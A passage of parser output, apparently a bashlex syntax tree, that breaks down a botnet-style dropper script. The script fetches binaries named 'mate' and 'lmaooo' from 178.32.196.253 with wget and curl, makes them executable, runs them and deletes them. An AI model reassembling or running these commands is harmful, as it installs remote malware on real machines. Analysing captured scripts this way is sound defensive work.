  OperatorNode(lineno=13, op=';', pos=(1882, 1883)),
  CommandNode(lineno=13, pos=(1884, 1918), parts=[
    WordNode(lineno=13, pos=(1884, 1888), word='curl'),
    WordNode(lineno=13, pos=(1889, 1891), word='-O'),
    WordNode(lineno=13, pos=(1892, 1918), word='http://178.32.196.253/mate'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1918, 1919)),
  CommandNode(lineno=13, pos=(1920, 1933), parts=[
    WordNode(lineno=13, pos=(1920, 1925), word='chmod'),
    WordNode(lineno=13, pos=(1926, 1928), word='+x'),
    WordNode(lineno=13, pos=(1929, 1933), word='mate'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1933, 1934)),
  CommandNode(lineno=13, pos=(1935, 1941), parts=[
    WordNode(lineno=13, pos=(1935, 1941), word='./mate'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1941, 1942)),
  CommandNode(lineno=13, pos=(1943, 1954), parts=[
    WordNode(lineno=13, pos=(1943, 1945), word='rm'),
    WordNode(lineno=13, pos=(1946, 1949), word='-rf'),
    WordNode(lineno=13, pos=(1950, 1954), word='mate'),
  ]),
])
ListNode(lineno=14, pos=(1955, 2123), parts=[
  CommandNode(lineno=14, pos=(1955, 1962), parts=[
    WordNode(lineno=14, pos=(1955, 1957), word='cd'),
    WordNode(lineno=14, pos=(1958, 1962), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1963, 1965)),
  CommandNode(lineno=14, pos=(1966, 1977), parts=[
    WordNode(lineno=14, pos=(1966, 1968), word='cd'),
    WordNode(lineno=14, pos=(1969, 1977), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1978, 1980)),
  CommandNode(lineno=14, pos=(1981, 1988), parts=[
    WordNode(lineno=14, pos=(1981, 1983), word='cd'),
    WordNode(lineno=14, pos=(1984, 1988), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1989, 1991)),
  CommandNode(lineno=14, pos=(1992, 2000), parts=[
    WordNode(lineno=14, pos=(1992, 1994), word='cd'),
    WordNode(lineno=14, pos=(1995, 2000), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2001, 2003)),
  CommandNode(lineno=14, pos=(2004, 2008), parts=[
    WordNode(lineno=14, pos=(2004, 2006), word='cd'),
    WordNode(lineno=14, pos=(2007, 2008), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2008, 2009)),
  CommandNode(lineno=14, pos=(2010, 2043), parts=[
    WordNode(lineno=14, pos=(2010, 2014), word='wget'),
    WordNode(lineno=14, pos=(2015, 2043), word='http://178.32.196.253/lmaooo'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2043, 2044)),
  CommandNode(lineno=14, pos=(2045, 2081), parts=[
    WordNode(lineno=14, pos=(2045, 2049), word='curl'),
    WordNode(lineno=14, pos=(2050, 2052), word='-O'),
    WordNode(lineno=14, pos=(2053, 2081), word='http://178.32.196.253/lmaooo'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2081, 2082)),
  CommandNode(lineno=14, pos=(2083, 2098), parts=[
    WordNode(lineno=14, pos=(2083, 2088), word='chmod'),
    WordNode(lineno=14, pos=(2089, 2091), word='+x'),
    WordNode(lineno=14, pos=(2092, 2098), word='lmaooo'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2098, 2099)),
  CommandNode(lineno=14, pos=(2100, 2108), parts=[
    WordNode(lineno=14, pos=(2100, 2108), word='./lmaooo'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2108, 2109)),
  CommandNode(lineno=14, pos=(2110, 2123), parts=[
    WordNode(lineno=14, pos=(2110, 2112), word='rm'),
    WordNode(lineno=14, pos=(2113, 2116), word='-rf'),
    WordNode(lineno=14, pos=(2117, 2123), word='lmaooo'),
  ]),
])
